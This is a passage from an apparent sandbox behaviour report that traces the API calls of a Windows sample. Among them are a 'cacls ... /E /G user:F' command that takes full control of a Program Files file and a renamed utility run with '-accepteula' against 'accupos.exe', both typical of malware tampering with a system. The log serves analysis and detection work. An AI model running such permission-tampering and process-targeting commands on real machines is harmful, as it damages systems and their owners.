lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2be6f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2be6f8) returned 0xffffffff [0248.121] GetLastError () returned 0x2 [0248.121] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.122] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2be6f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2be6f8) returned 0x696bb0 [0248.122] FindClose (in: hFindFile=0x696bb0 | out: hFindFile=0x696bb0) returned 1 [0248.122] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2be6f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2be6f8) returned 0xffffffff [0248.122] GetLastError () returned 0x2 [0248.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2be6f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2be6f8) returned 0x696bb0 [0248.123] FindClose (in: hFindFile=0x696bb0 | out: hFindFile=0x696bb0) returned 1 [0248.123] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0248.123] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0248.123] GetConsoleTitleW (in: lpConsoleTitle=0x2bebf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.123] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bea78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2beb40 | out: lpAttributeList=0x2bea78, lpSize=0x2beb40) returned 1 [0248.123] UpdateProcThreadAttribute (in: lpAttributeList=0x2bea78, dwFlags=0x0, Attribute=0x60001, lpValue=0x2beb38, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bea78, lpPreviousValue=0x0) returned 1 [0248.123] GetStartupInfoW (in: lpStartupInfo=0x2bea34 | out: lpStartupInfo=0x2bea34*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0248.124] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0248.125] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2bead4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2beb20 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x2beb20*(hProcess=0x74, hThread=0x78, dwProcessId=0x3c4, dwThreadId=0xb08)) returned 1 [0248.143] CloseHandle (hObject=0x78) returned 1 [0248.143] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0248.143] GetProcessHeap () returned 0x680000 [0248.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697f38 | out: hHeap=0x680000) returned 1 [0248.143] GetEnvironmentStringsW () returned 0x697f38* [0248.143] GetProcessHeap () returned 0x680000 [0248.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb36) returned 0x698a78 [0248.143] FreeEnvironmentStringsW (penv=0x697f38) returned 1 [0248.143] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) Process: id = "274" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x16d67000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 892 os_tid = 0x748 Thread: id = 894 os_tid = 0x90c Thread: id = 896 os_tid = 0xa38 Process: id = "275" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x16552000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "272" os_parent_pid = "0xa30" cmd_line = "tdq963ii.exe -accepteula \"accupos.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 893 os_tid = 0x264 [0246.620] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0246.620] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0246.620] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0246.620] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0246.620] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0246.620] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0246.621] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0246.622] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0246.623] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0246.624] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0246.625] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0246.626] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0246.627] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0246.628] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0246.629] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0246.630] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0246.630] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0246.630] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0246.631] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0246.631] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0246.631] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0246.631] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0246.631] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0246.631] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0246.631] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0246.631] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0246.631] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0246.631] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0246.632] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0246.632] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0246.632] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0246.632] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0246.633] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0246.633] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0246.633] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0246.633] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0246.635] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0246.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x48c66e00, dwHighDateTime=0x1d68287)) [0246.635] GetCurrentThreadId () returned 0x264 [0246.635] GetCurrentProcessId () returned 0xa44 [0246.635] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36697388122) returned 1 [0246.635] GetProcessHeap () returned 0x5a0000 [0246.635] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0246.635] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0246.636] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0246.637] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0246.638] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0246.639] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3bc) returned 0x5b60b0 [0246.639] GetCurrentThreadId () returned 0x264 [0246.639] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b6478 [0246.640] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5b6498 [0246.640] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"accupos.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xc2455049, hStdError=0x0)) [0246.640] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0246.640] GetFileType (hFile=0x3) returned 0x2 [0246.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0246.640] GetFileType (hFile=0x80) returned 0x3 [0246.640] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0246.640] GetFileType (hFile=0xb) returned 0x2 [0246.641] GetCommandLineW () returned="tdq963ii.exe -accepteula \"accupos.exe\" -nobanner" [0246.641] GetEnvironmentStringsW () returned 0x5b6ca0* [0246.641] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb7e) returned 0x5b7828 [0246.641] FreeEnvironmentStringsW (penv=0x5b6ca0) returned 1 [0246.641] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0246.641] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x72) returned 0x5af8d0 [0246.641] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa0) returned 0x5b6ca0 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3e) returned 0x5b83c8 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6c) returned 0x5b6d48 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6e) returned 0x5b6dc0 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x78) returned 0x5af950 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x62) returned 0x5b6e38 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b6ea8 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5b6ee0 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x22) returned 0x5b6f30 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x28) returned 0x5b6f60 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1a) returned 0x5b5a80 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4a) returned 0x5b6f90 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x72) returned 0x5af9d0 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b6fe8 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b7020 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1c) returned 0x5b5aa8 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xd2) returned 0x5b7058 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x7c) returned 0x5b7138 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x36) returned 0x5b71c0 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3a) returned 0x5b8410 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x90) returned 0x5b7200 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5b7298 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b72c8 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x36) returned 0x5b7300 [0246.642] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5b7340 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x52) returned 0x5b7390 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5b8458 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b73f0 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x82) returned 0x5b7410 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b74a0 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5b5ad0 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2c) returned 0x5b74d8 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x54) returned 0x5b7510 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x52) returned 0x5b7570 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, 